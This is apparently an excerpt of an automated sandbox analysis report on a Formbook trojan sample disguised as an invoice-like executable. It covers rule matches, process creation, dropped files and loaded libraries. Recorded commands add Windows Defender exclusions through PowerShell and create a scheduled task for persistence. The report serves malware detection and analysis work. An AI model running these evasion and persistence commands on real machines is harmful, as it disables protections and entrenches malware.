            Source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: CFV20240600121.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: BPSHhDGmARC.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, cPvKSbL63MQZmurUtZ.cs Security API names: _0020.SetAccessControl
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, cPvKSbL63MQZmurUtZ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, cPvKSbL63MQZmurUtZ.cs Security API names: _0020.AddAccessRule
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, cPvKSbL63MQZmurUtZ.cs Security API names: _0020.SetAccessControl
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, cPvKSbL63MQZmurUtZ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, cPvKSbL63MQZmurUtZ.cs Security API names: _0020.AddAccessRule
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, vTUORdGgKEO15QVN9b.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, vTUORdGgKEO15QVN9b.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, cPvKSbL63MQZmurUtZ.cs Security API names: _0020.SetAccessControl
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, cPvKSbL63MQZmurUtZ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, cPvKSbL63MQZmurUtZ.cs Security API names: _0020.AddAccessRule
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, vTUORdGgKEO15QVN9b.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CFV20240600121.exe.3210d94.1.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
            Source: 13.2.BPSHhDGmARC.exe.291874c.0.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.CFV20240600121.exe.3220dac.0.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.CFV20240600121.exe.a0c0000.7.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@31/16@16/14
            Source: C:\Users\user\Desktop\CFV20240600121.exe File created: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2520:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
            Source: C:\Users\user\Desktop\CFV20240600121.exe File created: C:\Users\user\AppData\Local\Temp\tmpA2C.tmp
            Source: CFV20240600121.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: CFV20240600121.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
            Source: C:\Users\user\Desktop\CFV20240600121.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\CFV20240600121.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: BPSHhDGmARC.exe.0.dr Binary or memory string: INSERT INTO [t_log] (logtime, guest_id, log_type) VALUES (getdate(), @guestId, @typeLog);
            Source: write.exe, 00000015.00000003.2560793646.0000000003053000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000002.4523478744.0000000003084000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000003.2560668534.0000000003032000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000002.4523478744.0000000003053000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: CFV20240600121.exe ReversingLabs: Detection: 28%
            Source: CFV20240600121.exe Virustotal: Detection: 41%
            Source: C:\Users\user\Desktop\CFV20240600121.exe File read: C:\Users\user\Desktop\CFV20240600121.exe
            Source: unknown Process created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\CFV20240600121.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\CFV20240600121.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\CFV20240600121.exe Process created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exe Process created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exe Process created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exe Process created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exe Process created: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmp25A3.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Process created: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Process created: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
            Source: C:\Windows\SysWOW64\write.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeProcess created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: slc.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: dwrite.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: amsi.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: edputil.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: appresolver.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: slc.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: sppc.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\write.exe Section loaded: winhttp.dll
